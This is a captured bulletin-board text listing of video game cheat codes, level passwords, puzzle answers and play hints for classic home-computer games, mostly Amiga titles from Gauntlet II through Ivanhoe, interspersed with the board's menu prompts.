NOTE: when entering a level, it's always best to station +the ship at the top left of the screen again, to avoid appearing at an illegal +position, or even off-screen. On the second level repeat the above process, +getting the buggy back in the top left hand corner, and retype STONKER again. +It now enables the ship to fly through walls, and pressing F while hovering +over switches allows them to be collected while in the air. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 7 + +Game Over II +------------------------------------------------------------------------------ +The access code for the second stage is 11423. + + + +Gauntlet II +------------------------------------------------------------------------------ +When you open a treasure chest, hold down the HELP key, then when you open a +second chest, hold down the INSERT key - a golden cross will appear. Collect +this and you'll find your health points rise to 50,000 and you'll also have +super shots for the remainder of the level. + + + +Gem-X +------------------------------------------------------------------------------ + B - EARTHIAN C - KENICHI D - INOKHUMA E - BURAI + F - BADMAN G - NETWORK H - YOKOHAMA I - EXACT +More[n,Y,=] J - X68000 K - TURRICAN L - REDMOON M - CAMPAIGN + N - MAGAMANN O - SYVALION P - FMTOWNS Q - CHIERIE + R - GAMERION S - ZAWAS + + + +Gemini Wings +------------------------------------------------------------------------------ +When you are about to be killed for the 4th time, press the left mouse button +to bring up the second player, and keep pressing the fire button until you're +killed. You will appear at the bottom of the screen. + +Or, try typing the following passwords to warp to each level: +Type P to bring up password system: + + 2 - MRWIMPEY + 3 - CLASSICS + 4 - WHIZZKID + 5 - GUNSHOTS + 6 - DOODGUYZ + 7 - D.GIBSON + + + +Genghis Khan +------------------------------------------------------------------------------ +If you get a land that isn't connected with an enemy, move everything to your +home country. The land will be safe, but if another leader captures a nearby +land, make sure you put something back in or he will attack on his next turn. + +Do not move all your forces into your command unit, or the enemy commander +will wait till he is down to his last few men and challenge you to a one on +one fight. If you lose he will get half your command unit. + + + +Ghostbusters II +------------------------------------------------------------------------------ +Hold down ALT CTRL 5 U when Activision logo appears and press fire. This also +stops the cable from breaking on Level 1. + + + +Ghosts N Goblins +------------------------------------------------------------------------------ +Play and get a high score. Type in )!( followed by the END option to quit the +table. Now start the game as normal, you will find you have lost your armour, +but your now invincible and have infinite lives. + + + +Ghouls N Ghosts +------------------------------------------------------------------------------ +As soon as the game starts type KAREN BROADHURST for invincibility. + +If that doesn't work - try the following cheat: + +When the credits screen appears type DELBOY. Now the next time you play you +will be completely invulunerable. + + + +Giganoid +------------------------------------------------------------------------------ +Press the CAPSLOCK key on the player select screen and a message will appear. +Start the game and you have more lives. + + + +Globulus +------------------------------------------------------------------------------ +The most important thing to remember is that ALL the puzzles can be solved +without losing a life, so if you lose a life and think its the only way to +solve the screen, look closely. Some of the puzzles get pretty obscure after +level 10, but once you eventually beat them you'll kick yourself for not +seeing the solution earlier. + +Look before you leap. Think about how the screen will look from a flipped +perspective. A lot of jumps you make will be unnecessary and waste time and +switches if you don't. + +Make sure you have enough switches, at least 10 per screen. It is possible +to get stuck on a downward slope with no way to get back up or kill yourself, +and the only way out is to press ESC and start the whole game over. + +Here are a few codes you might like to try: + + Level 06 - IVEs8AZ? + Level 11 - dynle1cJ + +Type Zvmo!EG as a password for the cheat mode. +NOTE: Use upper and lower case as shown! + + + +Gods +------------------------------------------------------------------------------ +Level Passwords: Level 2 - JZS + Level 3 - SFJ + Level 4 - USX + +On level two, buy a shield and a magic potion, then get three fireballs and +three stars. Spend all of your remaining money on food and health. Collect +all the gems in the usual manner, then get a key and make for the exit. Now +comes the tricky bit... + +When you descend the last ladder, two thieves will appear. Make sure that +you don't quite have enough energy to survive a direct contact! Before +going down the ladder, release your magic potion, then climb down and open +the door. Stand in front of the door ready to leave, but don't push up yet! +Wait until the thieves jump down at you and as soon as they touch you push +the joystick up. You may loose that life, but then something rather strange +will happen. The bonus will start to whiz up for quite some time, until +the game starts again on world two with 28 extra men and about five million +points! + + + +Goldrunner +------------------------------------------------------------------------------ +Type EASYMODE on the high score screen and now F9 to skip levels, and makes +you invulnerable. F8 turns off cheat (why???). + + + +Gravity Force +------------------------------------------------------------------------------ + Level 5 - AGNUS + Level 10 - PARSEC + Level 15 - CRYSTAL + Level 20 - REACTOR + Level 25 - VISION + Level 30 - ORBIT + Level 40 - ALIEN + LEVEL 45 - FALCON + +Or type WARPxx where xx is the level number you want. + + + +Great Gianna Sisters +------------------------------------------------------------------------------ +While playing hold down the keys A,R,M,I, and N to skip to the next level. On +level 3 stand at the end of the row of blocks and jump up to hit an invisible +block that takes you to level 6. + + + +Gremlins II +------------------------------------------------------------------------------ +Type SINATRA on the high score table for infinite lives. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 8 + +James Pond +------------------------------------------------------------------------------ +Type JUNKYARD and hit RETURN to cheat. Press D to remove locks. + + Key for Level 3 - Z + 4 - X + 5 - C + 6 - V + 7 - B + 8 - N + 9 - M + + + +Judge Dredd +------------------------------------------------------------------------------ +Log onto the computer as DREDD then type BRUCKEN PLAYING HEROQUEST and exit. +The HELP key can now be used to skip levels. + +More[n,Y,=] Note: Possible a space in HEROQUEST, like HERO QUEST, maybe not, who knows? + + + +Karate Kid II +------------------------------------------------------------------------------ +You should enter your name as MYAGI on the high score table. During the game +press P to skip to the next level in one player mode. You can, of course, +skip right up to the final encounter. + +In two player mode you can only skip to the next to last screen. + + + +Keef the Thief +------------------------------------------------------------------------------ +For something interesting in this game go up into the tree houses near the +left side of the map. When you see a commercial like screen with a woman in +it make this spell: Rhino Horn, Black Pearl, Narcicus Root. + + + +Kick Off +------------------------------------------------------------------------------ +You can allways make the other guy miss the shot totally just by holding down +the firebutton while he attempts to make the shot, it's blocked. + + + +Kick Off 2 +------------------------------------------------------------------------------ +Keep pressing the R key when you take a penalty, this will show you where the +player's going to kick the ball. + + + +Kid Gloves +------------------------------------------------------------------------------ +Pause game, then type RHIANNON followed by the F9 key for invulnerablity. If +the game doesn't unpause itself, press F1 and then pause the game again and +retype above. This will make you invincible. F6 will take you back to the +shop and F8 will give you lots of money. + + + +Killing Cloud +------------------------------------------------------------------------------ +Mission 2 - A66TG7EZ + 3 - 2WWTQ7E3 + 4 - QXX6G6EB + 5 - 3336RWE3 + + When the game asks for a mission code, enter `1 KILLING'. + This will give you 28 nets and 29 PUPS. + + + +Killing Game Show +------------------------------------------------------------------------------ +To call up a map of level one, section one, boot up the game as normal and +when asked to hit FIRE, hit the HELP key instead. There it is. Do the same +for each section. + + + +Kings Quest III +------------------------------------------------------------------------------ +When casting a spell and asked to recite a verse just hit RETURN. + +The King's Quest series of games uses the debug command and interpreter for +the programmers (up to KQIII) KQIV doesn't have it because of the tremendous +size of the game. Have some fun and press the "ALT" key then "D" then +"Return or Enter" (I think twice) then type in either GET OBJECT (and type in +a random #) or "TP" for transport (and a random #) and see what happens. It +works., and if you're tired looking for a certain object the "Get Object" +function works great! + + + +Klax +------------------------------------------------------------------------------ +Begin play and hold down either SHIFT key and SPACE together. Now press any +key from 1 to 4 for differnt helpful effects. + +While playing the game, press SPACE and 4 to warp to LA stage. + + + +Kristal +------------------------------------------------------------------------------ +Fights - Proficent swordplay is essential if your to get anywhere in + the game. The neck chop is one of the more effective blows, but the + program blocks repetition of single moves. To get around this, occass- + ionaly switch to a differnt move in order to enable the neck chop once + again. Give generously to the poor and youll be a step closer to ob- + taining the Sword of the Spheres. + + The Palace - To enter the palace, youll need to get the invitation + from the elusive Gloop, found in Novala. Once you have it, keep out of + fights or you could lose it for good. When you get into the palace, + ask Nedrod three questions and he will give you the talisman, which + can help you find another useful item. Answer the Princess's question + with "Its a secret". She will give you the Ring of Belz, which will + only work in conjunction with the spell scroll. + + In General - Objects are not always found in the same places from game + to game, so a detailed search of both fore and backgrounds is often in + order. To survive the final confrontation, a high psychic rating is + needed, which can be increased by donating skringles to the poor. Dis- + orderly conduct can have the opposite effect. The safest technique in + the space battles, is to slow right down as soon as you see the aliens + shoot them all, then power at full steam until the next lot. Follow + Readheads ship if you see it. Heatpro tablets are necessary if you + beam down to one of the hotter planets. Makes notes of what you are + told, and use any new names or subjects to weavel out every last bit + of information from the characters. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 9 + +Laser Squad +------------------------------------------------------------------------------ +In LASER SQUAD, for fun do The Assassins on Level 1. Buy no armour, give the +corporal an M4000 with two reloads, the next two rocket launchers with four +rockets each, and the last two nothing at all. Deploy in the entrance, in the +gap in the outer wall , and take the house to pieces with the rockets, waiting +for droids or Regix to show up - get them with Jonlan's M4000. I managed to +do the scenario with one shot - it went BETWEEN the leaves of the door, blew +up against a wall and Regix was on the other side. End of story, fade to +black. + + + +Last Duel +------------------------------------------------------------------------------ +Pause and press F9 the hold down HELP, LEFT SHIFT, and 1 all at once then +unpause the game and press the function keys to go level hopping. +F8 adds five lives to your total. + +More[n,Y,=] + +Last Ninja +------------------------------------------------------------------------------ +To kill the Dragon throw a smoke bomb under him. + + + +Last Ninja II +------------------------------------------------------------------------------ +To board the helicopter at the end of level 5 you must first allow the +helicopter to leave the screen, then run to the end of the building and jump +in the direction that the helicopter left, making sure that you completely +exit from the screen. + +Last Ninja III +------------------------------------------------------------------------------ +Play the game and try to get into the hihgscore-list. There enter instead of +your name ILLBEBACK and start a new game. From there on you got unlimited +lifes and you can choose levels with F1-F6! Have Fun! THE COMPANY! + + + +Leatherneck +------------------------------------------------------------------------------ +Start the game as usual, then type CUTHBERTNECK and press F3. All players get +protection from enemy fire. + + + +LED Storm +------------------------------------------------------------------------------ +Type DAVID BROADHURST WANT TO CHEAT and get infinites. If that doesn't work +try DAVID BROADHURST WANTS TO CHEAT. + + + +Legend of Faerghail +------------------------------------------------------------------------------ +Load in several of the players that come pre-rolled on the disk, and load an +original of your own. Go sell all their equipment, have them withdraw all +monies from the bank, and transfer to you. Create new characters and do the +same as often as you need, and you'll have plenty of gold to properly outfit +you stalwart band. + +Here are the answers to some of the questions and riddles you'll be asked +while you're rummaging around in the dungeons of Faerghil. + +In the ELVEN PALACE + +Q: Who is Findal's yougest uncle? A: SCAGNAR +Q: Who is Findal's father? A: FINDAIL +Q: Who is Findal's great parent? A:ALGANOR + +In the DRAGONSERVANT'S TEMPLE + +Q: What lies between myself and my opposite? A: AND + +In the CASTLE + +Q: What tries to go up, but stops short, has but one foot, and can not walk? +A: STAIRS + +In the RUINS OF ANCIENT ORACLE + +Q: The more it gets, the more it eats, and has it eaten all, it dies. What + is it? A: FIRE +Q: I talk without soul, I hear without ears, I talk without mouth, and I'm + born in air. What am I? A: ECHO +Q: Two little windows, they have no glass, they stand together like flowers + in grass. Two little windows, they show us the world, they show us the + stars, the forest, the field, the fold. What could they be? A: EYES + + + +Legend of the Lost +------------------------------------------------------------------------------ + 2) STONES 3) LADDER 4) ESCAPE 5) LAVA 6) FINALE + + + +Leisure Suit Larry +------------------------------------------------------------------------------ +You can go to any location in the game by by hitting ALT-D and entering (TP). +It asks for a location number, so enter 008-045. + +Skip the proof of age questions by hitting ALT X. + + + +Lemmings +------------------------------------------------------------------------------ +Keep the Lemmings from killing themselves by typing FQUIGGLY on the title +page. + +Here are the complete codes to all lvels of Lemmings: + + + FUN LEVEL TRICKY TAXING MAYHEM + ---------- ---------- ---------- ---------- + 1 ---------- HBANLMFPDV MFIBAJLNFS NHMFHFALHV + 2 IJJLDNCCCN BINCMFHQDO FIBIJLMOFL HMFHFINMHO + 3 OHNLHCADCN BAJHLDIBEO IBANLMFPFY MFHFAJLNHX + 4 HNLHCIOECW IJHLDIBCEX BINLMFIQFR FHFIJLMOHQ + 5 LDLCAJNFCK NHLDIBADEU FAJHLDHBGT HFANLMFPHN + 6 DLCIJNLGCT HLDIBINEEN IJHLDHFCGM FINLMFHQHW + 7 HCANNNLHCW LDIBAJLFEW NHLDHFADGJ FAJHLDIBIW + 8 CINNLDLICJ DIBIJLLGEP HLDHFINEGS IJHLDIFCIP + 9 CEKHMDLJCO IBANLLDHEM LDHFAJLFGL NHLDIFADIM + 10 MKHMDLCKCX BINLLDIIEV DHFIJLLGGV HLDIFINEIV + 11 NHMLHCALCT BAJHMDIJEX HFANLLDHGR LDIFAJLFIO + 12 HMDLCIOMCJ IJHMDIBKEQ FINLLDHIGK DIFIJLLGIX + 13 MDLCAKLNCS NHMDIBALEN FAJHMDHJGM IFANLLDHIM + 14 LHCIKLOOCR HMDIBINMEW IJHMDHFKGV FINLLDIIIN + 15 HCEONOLPCU MDIBAJLNEP NHMDHFALGS FAJHMDIJIP + 16 CMOLMDLQCV DIBIJLMOEY HMDHFINMGL IJHMDIFKIY + 17 CAJHLFLBOT IBANLMDPEV MDHFAJLNGV NHMDIFALIV + 18 IJHLNHBCOP BINLMDIQEO DHFIJLMOGN HMDIFINMIO + 19 OHLFHBADDV BAJHLFIBFR HFANLMDPGK MDIFAJLNIX + 20 JLNACIOEDJ IJHLFIBCFK FINLMDHQGT DIFIJLMOIQ + 21 NNHCAKLFDS NHLFIBADFX FAJHLFHBHW IFANLMDPIN + 22 NHCMJLNGDO HLFIBINEFQ IJHLFHFCHP FINLMDIQIW + 23 HCAOLLNHDW LFIBAJLFFJ NHLFHFADHM FAJHLFIBJJ + 24 BINLLFHIDV FIBIJLLGFS HLFHFINEHV IJHLFIFCJS + 25 BAJHMFHJDX IBANLLFHFP LFHFAJLFHO NHLFIFADJP + 26 IJHMFLCKDV BINLLFIIFY FHFIJLLGHX HLFIFINEJY + 27 NHMFHBALON BAJHMFIJFK HFANLLFHHV LFIFAJLFJR + 28 HMNHCINMDP IJHMFIBKFT FINLLFHIHN FIFIJLLGJK + 29 MFHBAJLNDP NHMFIBALFQ FAJHMFHJHP IFANLLFHJX + 30 FHBIJLMODY HMFIBINMFJ IJHMFHFKHY FINLLFIIJO + + + +Lemmings 2 - Oh No! More Lemmings +------------------------------------------------------------------------------ +And the complete levelcodes to Lemmings 2 - Oh No! More Lemmings: + + + TAME CRAZY WILD WICKED + ---------------------------------------------------- + LEVEL 01: ---------- TFLCAHVFBD BAHPUDIJCN UFIBAHTNDI + LEVEL 02: IHRTDNCCAD FLCIHTTGBK IHPUDIBKCG FIBIHTUODR + LEVEL 03: LRTDLCADAO HBALTTFHBS LPUDIBALCD IBALTUFPDO + LEVEL 04: PTDLCILEAF BILTTFHIBL PUDIBILMCM BILTUFIQDH + LEVEL 05: TDLCAHTFAO BAHPUFHJBN UDIBAHTNCF FAHPTDHBEJ + LEVEL 06: DLCIHVTGAJ IHPUFHBKBG DIBIHTUOCO IHPTDHFCES + LEVEL 07: LCAMTTDHAF LPUFHBALBD IBALTUDPCL LPTDHFADEP + LEVEL 08: CIMVVLHIAG PUFHBILMBM BILTUDIQCE PTDHFILEEI + LEVEL 09: CAHRUDLJAR UFHBAHTNBF BAHPTFIBDH TDHFAHTFER + LEVEL 10: IHRUDLCKAK FHBIHTUOBO IHPTFIBCDQ DHFIHTTGEK + LEVEL 11: LRUDLCALAH HBALTUFPBL LPTFIBADDN HFALTTDHEH + LEVEL 12: RUDLCILMAQ BILTUFHQBE PTFIBILEDG FILTTDHIEQ + LEVEL 13: UDLCAHVNAJ BAHPTDIBCE TFIBAHTFDP FAHPUDHJES + LEVEL 14: DLCIHVUOAS IHPTDIBCCN FIBIHTTGDI IHPUDHFKEL + LEVEL 15: LCALVUDPAP LPTDIBADCK IBALTTFHDF LPUDHFALEI + LEVEL 16: CILTUDLQAG PTDIBILECD BILTTFIIDO PUDHFILMER + LEVEL 17: CAHRTFLBBL TDIBAHTFCM BAHPUFIJDQ UDHFAHTNEK + LEVEL 18: IHRTFLCCBE DIBIHTTGCF IHPUFIBKDJ DHFIHTUOED + LEVEL 19: LRTFLCADBR IBALTTDHCS LPUFIBALDG HFALTUDPEQ + LEVEL 20: RTFLCILEBK BILTTDIICL PUFIBILMDP FILTUDHQEJ + + + +Leonardo +------------------------------------------------------------------------------ +Level 10 - Emmentaler + Level 20 - Alphorn + Level 30 - Matterhorn + Level ?? - Ivanhoe + +Or type FREIBIERIC and the screen will flash and tell you you have discovered +the secret of Leonardo, giving you unlimited lives. + + + +Light Corridor +------------------------------------------------------------------------------ +First a little hint: The green diamonds are essential as these award you +with an extra life. Some of the red diamonds will allow control over two +bats but this is more of a hinderence as the two bats prove confusing. +Avoid the blue squares as they will shrink the size of your bat. + + + 01 - 0000 05 - 2602 10 - 3305 14 - 6407 18 - 3810 + 02 - 5400 06 - 9902 11 - 9305 15 - 2008 19 - 0511 + 03 - 0101 07 - 4303 12 - 3406 16 - 7408 20 - 6811 + 04 - 3901 08 - 9003 13 - 0407 17 - 4709 + + 21 - 3212 26 - 8215 32 - 9919 37 - 1223 42 - 9726 47 - 3030 + 22 - 0213 28 - 5116 33 - 7320 38 - 4523 43 - 5927 48 - 0531 + 23 - 8213 29 - 7017 34 - 2521 39 - 4124 44 - 0528 49 - 8431 + 24 - 5014 30 - 5518 35 - 0622 40 - 1825 45 - 7328 50 - 9932 + 25 - 1015 31 - 2819 36 - 3722 41 - 1926 46 - 3929 + + + +Line of Fire +------------------------------------------------------------------------------ +On the control options screen type OPERATION FERRET and the screen now changes +and you'll be invulnerable with the ability to skip levels by pressing 0-9. + + + +Logical +------------------------------------------------------------------------------ +You can get a screen editor for this one just by typing THE FINAL CUT. + +01 WELCOME 11 DONT PANIC 21 BE HONEST 31 BLUE VELVET +02 THE OTHER SIDE 12 COLORMANIA 22 BLUE N VIOLET 32 PARADISE I +03 QUADRI QUADRA 13 REFRESHMENT 23 THREE PATH 33 CLASSIC ART +04 STONE ROAD 14 FULL MOON 24 DANGEROUS 34 VENI VIDI VICI +05 NICE COLORS 15 RUNNING BALLS 25 THE WANDERER 35 WE LIKE IT +06 MORE COLORS 16 GREEN RIVER 26 SECRET CHAMBER 36 FOREVER HERE +07 REAL FUN 17 TWO ISLANDS 27 FALCONS FLIGHT 37 WONDERLAND +08 PINK AND PINK 18 MORE ISLANDS 28 BLUE ANGEL 38 THE SNARE +09 GREEN PATH 19 TIMES CHANGE 29 FAR THUNDER 39 CURE IT +10 BAD DIRECTION 20 OTHER THINGS 30 A SIMPLE ONE 40 SUN IS SHINING + +41 A RAINBOW 51 LOGISTIC 61 WILD AT HEART 71 WALK IN CREAM +42 ARROW ROAD 52 TURNING COLORS 62 THE DARK AGE 72 TOUCH HER +43 TURNING WHEELS 53 PARAMOUNT 63 DIMLIGHTS 73 SHADOWLAND +44 ACCELERATION 54 THE LADDER 64 THE FIFTIES 74 JACK IN BAG +45 THE PRESDENT 55 BACK N RED 65 PICTURE OF HER 75 VITAMIN C +46 HE IS MISSING 56 TREASURE ROOM 66 GORDIAN KNOT 76 STUNT BALL +47 PICKNICK TIME 57 DONT WANT THAT 67 HIGH SPEED 77 MIRRORLAND +48 WHO IS CALLING 58 THE FREE FALL 68 ALEXANDRIA 78 ACE QUEST +49 ANCIENT ART 59 CORRADO BEACH 69 RUNNING TEAR 79 BOA BOA BOA +50 SHE IS GONE 60 MORE POPCORN 70 HER RAINBOW 80 DA DA DA + +81 HAUNTED HOUSE 91 SHE COMPARES and the Password for the Editor is: +82 THE SECRETS 92 BIG MOUNTAINS +83 SMILING JOKE 93 TOMOTTOW THE FINAL CUT +84 CHILDREN GO 94 TELEPORTER JAM +85 IT IS ATLANTIS 95 LEVER SUNLIGHT +86 ON THE ROAD 96 NEW EXODUS +87 BLUE IS FIRST 97 THE PEACEPIPE +88 WOLFS MOON 98 FINAL SURPRISE +89 WILD CHINA 99 WHITE MIAMI +90 ITS LOGICAL + + + +Lombard R.A.C. Rally +------------------------------------------------------------------------------ +The complete questions and answers for the T.V. interview section follow, +(the questions are not listed in order, they show randomly): + + 1. What is curious about the Cadet GSI? + B: It has a second footbrake. + 2. Who won the 1980 Lombard R.A.C. Rally? + B: H. Toivonen & P. White. + 3. The Ypres Rally in Belgium is held over? + A: 24 hours. + 4. Which company provided the tyres for the 1988 Lombard R.A.C. + Rally? + A: Pirelli. + 5. Where is Nuremburg 24 Rally held? + B: Germany. + 6. How long has Lombard sponsered the rally? + C: 14 years. + 7. Who won the 1977 Olympus Rally? + C: Ron Richardson. + 8. How many levels are the R.A.C. M.S.A. Rallies held over? + B: Five graded levels. + 9. What is the nationality of the driver Kenith Erikson? + A: Swedish. + 10. Carne De Passage is? + C: A customs document. + 11. How many times has the Ford Escort won the Lombard R.A.C. Rally? + B: Eight. + 12. What is the overall length of the Ford Sierra RS Cosworth? + B: 4.46 metres. + 13. During what decade did the Lombard R.A.C. Rally not run? + A: 1940 - 1950. + 14. Who won the 17th New Zealand Rally? + C: Franz Whittingham. + 15. Which car won the first World Championship Rally for Group A cars? + C: Lancia. + 16. How much does a Peugeot 205 GTi weigh? + A: 880 kg. + 17. Franz Whittingham was the first Austrian to? + B: Win a World Rally. + 18. Which is the only Rally with more than one starting point? + A: Monte Carlo. + 19. The time spent between arrival control and the stage start is + known as? + B: Dead time. + 20. Part of the 1987 Rally was run at Clumber Park. In which county + is this park in? + B: Nottinghamshire. + 21. A B.M.W. group A car is available in kit form, it is? + A: M3. + 22. How many times has the Mini won the Rally? + A: 1. + 23. In what year was the Rally cancelled due to foot and mouth + disease? + B: 1967. + 24. What is the R.A.C. British Motorsport's Yearbook known as? + A: The Blue Book. + 25. The Japanese Supra 3.0i had which problem in the 1987 Safari + Rally? + A: Overheating. + 26. How many Marshalls are involved in the running of the Rally? + C: 15,000. + 27. Who was the 1987 Soviet Union national champion? + C: Ilmar Rossier. + 28. The Nissan 200sx made its first European Rally appearence in? + A: Greece. + 29. What is the Targa system? + B: A route timing system. + 30. Who won the seventh Malborough Rally of Argentina? + C: Mickey Biassion. + 31. Are two-way radios allowed between crews and service-crews? + A: Yes. + 32. What was the maximum number of starters allowed in the 1988 + Lombard R.A.C. Rally? + B: 180. + 33. What is the alternative route defining system known as? + C: The Tulip Card. + 34. What is the engine size of the Ford RS Cosworth? + B: 1993cc. + 35. What is the R.A.C. M.S.A. speed limit in road Rallys? + A: 30mph. + 36. Which manufacturer won the 1987 R.A.C. Rally? + B: Lancia. + 37. Who was the first driver to participate in 100 W.C.R. events? + A: Hannu Mikoia. + 38. Lancia won the Monte Carlo Rally with Aereia in? + B: 1954. + + + + +Loopz +------------------------------------------------------------------------------ + Screen 1:EASY + Screen 6:GRVY + Screen11:TRBY + Screen16:STNL + Screen21:GZPN + Screen26:PLGR + Screen31:KRNC + Screen36:BGDK + Screen41:FRNK + Screen46:ZSZS + + + +Lotus Esprit +------------------------------------------------------------------------------ +Enter first players name as FIELDS OF FIRE and second as IN A BIG COUNTRY to +qualify without doing so. Also try entering MONSTER and SEVENTEEN. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 0 + +Unknown command '0' + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 10 + +Hacker II - The Doomsday Papers +------------------------------------------------------------------------------ +COVER H2SC - end screen +TITLE H2SC - title page + DEMO H2SC - Speeds play and jumps check procedures + + + +Hades Nebula +------------------------------------------------------------------------------ +Enter MONITOR when you're on the high-score list. You should now have +infinite lives. + + + +Hammerfist +------------------------------------------------------------------------------ +On the high score table enter the phrase TAEHC OT TNAW I and restart the game. +Now you are able to skip levels via the F-keys. +More[n,Y,=] + + +Hard Drivin +------------------------------------------------------------------------------ +Attain full speed then press the N key. You now continue driving at full +speed with easy steering, invincibility and unlimited time. + + + +Hardball +------------------------------------------------------------------------------ +Various hints: + + * Allstars are better than champs, + * Only steal if you actually hit the ball, + * Try to get a lot of runs early, as the computer team improves + towards the end, + * Bunting rarely works, + * Halfway through the match, swap Laws for Wells and Wratten for + Harris. +More[n,Y,=] * The best pitchers are Oliver, Perez, Leary, Cook. The others + will only be successful for a short while, + * Never pitch fastballs to the center as they will usually result + in home runs, + * Change pitchers after a few innings, because as they get tired, + their accuracy and speed get worse. + + + +Hawkeye +------------------------------------------------------------------------------ +Pause the game and press the DEL key, after doing so, when you die, you will +be warped to the next level at the end of the game. Press the 2 key to go +back and forth between the stages. + +Also during the game try pressing the HELP key, unpause the game and +continue along your way with an endless supply of lives. + + + +Helter Skelter +------------------------------------------------------------------------------ +Start a 2 player game then have player 1 get an extra life. Let both players +lose all their lives and then player 2 will return with 99 lives, as soon as +he dies once, player 1 will come back with 99 lives. Just incase that's too +difficult for you, here are some codes to the levels, maybe you can get +someone to type them for you, and play the game... + + Level 11 - SPIN + Level 21 - FLIP + Level 31 - BALL + Level 41 - GOAL + Level 51 - LEFT + Level 61 - TWIN + Level 71 - PLAY + + + +Heros of the Lance +------------------------------------------------------------------------------ +Some general tips: + + Arrange your party so that the first line consists of two strong warr- + iors, Raistlin and Goldmoon. This allows you to use Raistlin's magic & + the healing staff of Goldmoon without too much hassle. Save Tanis and + Riverwind for the later levels, where the bows come in handy. When + fighting Gully Dwarves, use Tasslehoff who is the same height as them. + His sling stones will never miss. Avoid fighting Hatchlings, they're + not worth it. Just turn and run when you meet one; when you reach an + intersection move into a new path and wait a little. When you return, + the Hatchling will have gone. Killing Bozaks: two methods: 1) get + Raistlin to use a web, sleep or charm spell to stun it, then send a + warrior to clobber it to death, or 2) select Flint, who is a dwarf; 9 + out of 10 times, the Bozak's shots will go over his head get close to + enter melee combat, and use low thrusts to kill it. Spectral Minions: + they're easy to kill, so use a warrior. Wraiths: a well-timed throw of + an axe kills them every time. If you miss, use a sword and chest-thrust + movements. Don't let it get too close to you! Spiders: use low thrusts + to keep them at bay. If they get through your guard, retreat until you + can turn and fight again. The blue and green potions restore health, + red slows down monsters, and yellow give your characters extra confid- + ence. + + + +Hillsfar +------------------------------------------------------------------------------ +When you are attempting to pick locks, make life a whole lot easier by +pressing the F key (that key located between the D and G on the keyboard). + + + +Horror Zombies from the Crypt +------------------------------------------------------------------------------ +To attain infinite lives just hold down the M key. If that's not enough, +type CHEATMODE then you be able to use the F10 key to skip levels. + +Or maybe some codes would help: + + Level 1 - Just hit return Level 4 - LUGOSI + Level 2 - WOLFMAN Level 5 - NOSFERATU + Level 3 - HAMMER Level 6 - GARLIC + +How about typing BOGEYMAN for infinite lives? + +Enough already! + + + +Hunt for Red October, The +------------------------------------------------------------------------------ +When surronded by enemy ships, it's quite likely they plan to blow all hell +out of you. Don't let them, cheat! Save the game. Restore the game, where +the hells have all those subs gone? hehe + + + +Hybris +------------------------------------------------------------------------------ +Load the game as usual and don't do anything until the high score + screen appears. Type 'COMMANDER' and then press the fire button. + After a few moments press F10. If your ship flickers you are now + invulnerable, and have infinite expansions and smart bombs. + + F1-F5 = Other Six Levels of 'expansion' (you can still capture the + capsules) + F8 = Advance a level (There are three) + F10 = Turn cheat mode on/off + + You cannot get a high score with the cheat mode on. + At the title screen type SPACE or ESC key (I forgot exactly which + one) Now you'll get a screen in which you can edit a lot of game + parameters. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 11 + +IK+ +------------------------------------------------------------------------------ +To become invincible allow yourself to be hit. Pause the game. Unpause and +nothing can kill you. + + + +Ikari Warriors +------------------------------------------------------------------------------ +Somewhere you should type FREERIDE to cruise through the game with no worries +about enemy fire. + + + +Immortal, The +------------------------------------------------------------------------------ +Some codes to help you kick the game: + + Level 2 - 757fc10006f70 +More[n,Y,=] Level 3 - 6e1ec21000e10 + Level 4 - 465fa31001eb0 + Level 5 - d4bfd41000eb0 + Level 6 - bcfef51010a41 + Level 7 - 6b10f61010ac1 + Level 8 - e590d710178c1 + + + +Impossamole +------------------------------------------------------------------------------ +On the high score table you may enter these codes to illict the proper +actions, noted to the right of each code, seperated by a dash. + + COMMANDO - No time limit for weapons + HEINZ - Three power bars + ANNFRANK - Low energy topped up + LUMBAJAK - Double length energy bar + OOCHOUCH - Walk on water + JUGGLERS - Try it out + + + +Indiana Jones and the Last Crusade (Arcade version) +------------------------------------------------------------------------------ +Type IEHOVAH on the title screen and wait till said screen flashes. Now you +can press L in the game to skip levels and the number keys 1 & 2 to skip just +sections of each level. + +But also be sure to type SILLYNAM on the high score screen for unlimited +continues. + + + +Infestation +------------------------------------------------------------------------------ +To get into the underground complex, first find a small, upright, rectangular +box with two flashing squares on it; thats the computer terminal. Face the +flashing squares, hit F2 to bring up the computer, and enter the words +KAL SOLAR to activate it. Hit F2 again to exit. On your way to the computer, +you should have passed a shower like structure. That's the transporter. Go +back to it and enter it, being very careful to face exactly in the direction +of the flashing arrows. This will take you to the complex. + + + +Insanity Flight +------------------------------------------------------------------------------ +To skip to any level simply hold in both mouse buttons, the joystick button, +and press the L key. You may need someone elses help for this one. + + + +Interceptor +------------------------------------------------------------------------------ +For extra missions select free flight and then press 6 7 8 or 9 to enter the +mission. What you have to do is work this out for yourself. + + + +International Karate +------------------------------------------------------------------------------ + FREZ - freeze the game + PAC - Pacman across the screen + FISH - Makes a fish leap out of the water + BIRD - Bird across the screen + PERI - Periscope rises out of the water + + Typing FUCK and CUNT results in an interesting message. + +And that's yer lot. + + + +Interphase +------------------------------------------------------------------------------ +Type FENNY (capitol F, rest lowercase) then press left mouse to cycle though +all the objects. + + + +It Came from the Desert +------------------------------------------------------------------------------ +Before attempting to go into the ants' nest, you should first save Elmer to +get more flamethrower fuel. Some time between the 8th and 10th (I don't +remember the exact day), he will leave a note in his station saying that he is +going hiking in the SW Volcanic Cone. Go to the volcano, fight the ants, and +next day, visit Elmer's station. He'll thank you for saving his life and give +you more flamethrower fuel. + +The entrance to the ants' nest will never appear on the main map, but there +are several other ways to get there: + + - By taking a flight from Hilber's Field. + + - By driving a tank from a battle going on at a nearby location. + + - By going south when you are in a battle at the M1 mine. + +The entrance to the nest doesn't stay open long enough for you to get in +before the ants start invading the various locations in the town so you'll +have to wait until they do. The 11th is the best day to enter the hole since +it is very hot and there are few ants around. If you try cooler days, there +will probably be too many of them around for you to handle. Also, if you +decide to get to the hole by plane, you can land safely on the dirt road +parallel to the tracks leading to the M1 mine. + + + +Ivanhoe +------------------------------------------------------------------------------ +To activate the cheat pause the game, type JC IS THE BEST then unpause. + + N - Skip levels + DEL - Kills all on-screen enemies + CTRL - Kills the boss dude + +Enter item#, Scan, Quit, ?=Menu + 